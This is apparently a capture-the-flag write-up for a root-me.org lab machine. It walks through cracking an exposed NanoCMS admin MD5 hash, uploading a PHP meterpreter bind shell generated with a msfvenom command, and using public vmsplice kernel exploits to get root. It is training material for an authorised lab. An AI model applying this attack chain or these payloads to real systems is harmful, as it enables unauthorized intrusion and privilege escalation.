## Version 2.0
## language: en

Feature:
  Site:
    root-me.org
  Category:
    Realist, CTF
  User:
    mr_once
  Goal:
    Get a root shell and read the flag

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.07.01  |
    | Firefox         | 78.0.2      |
    | Metasploit      | 5.0.88-dev  |
    | searchsploit    | n/a         |
  Machine information:
    Given I am accessing the machine at http://ctf07.root-me.org
    And I see a webpage

  Scenario: Success:Log in as admin
    Given I am in the blog section
    And I see that it is powered by "NanoCMS"
    When I look for possible vulnerabilities I found
    """
    https://www.securityfocus.com/bid/34508/exploit
    """
    Then I go to
    """
    http://ctf07.root-me.org/~andy//data/pagesdata.txt
    """
    And I can see, among other thing, this:
    """
    "admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd"
    """
    When I try to reverse the hash I found that
    """
    9d2f75377ac0ab991d40c91fd27e52fd = md5(shannon)
    """
    Then I can log in as admin [evidence](admin.png)

  Scenario: Success:Get a shell
    Given I am in the admin panel
    Then I see that I can add new pages
    And I use "msfvemon" to make the server to listen conections on port 4000
    """
    msfvenom -p php/meterpreter/bind_tcp LPORT=4000 -f raw > shell.php
    """
    When I try to connect with metasploit
    Then I get a meterpreter session [evidence][meterpreter.png]

  Scenario: Fail:Wrong kernel exploit
    Given Now I have a shell
    And the kernel of the machine is  "2.6.23.1-42.fc8"
    When I use "searchsploit" to find an exploit I found
    """
    ...
    Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1) |\
    linux/local/5093.c
    ...
    """
    Then I upload the exploit to the machine using meterpreter upload's command
    Then I compile the exploit using "gcc"
    But when I run it the machine just crashes

  Scenario: Fail:Try admin password against SSH
    Given that the exploit failed and I had to start over
    Then I decide to look around inside the system
    And I found in "/home/" five users
    """
    $ ls -la /home/
    total 56
    drwxr-xr-x  7 root     root     4096 May  5  2009 .
    drwxr-xr-x 23 root     root     4096 Jul 14 10:47 ..
    drwxrwxr-x  3 amy      amy      4096 May  5  2009 amy
    drwxrwxr-x 24 andy     andy     4096 May  4  2009 andy
    drwxrwxr-x 23 jennifer jennifer 4096 May  5  2009 jennifer
    drwxrwxr-x 23 loren    loren    4096 May  5  2009 loren
    drwxrwxr-x 26 patrick  patrick  4096 May  5  2009 patrick
    """
    And I try to log in via SSH with this users and the pass "shannon"
    But It does not work

  Scenario: Fail:Get cronjobs
    Given that all methods I tried untill now did not work
    Then I tried to look at the cronjobs
    But I do not have access to "/etc/cron.d"
    And the other "cron*" folders are empty

  Scenario: Success:Right kernel exploit
    Given I can't find a way to scalate privileges
    Then I decide to take a look again at kernel exploits
    And I found the exploit
    """
    https://www.exploit-db.com/exploits/5092
    """
    And I see that it is verified
    And I decided to try this one
    When I compile and run the exploit it did not work
    Then the second time it works [evidence](exploit.png)
    And now that I am root I can read the flag
    And pass the challenge
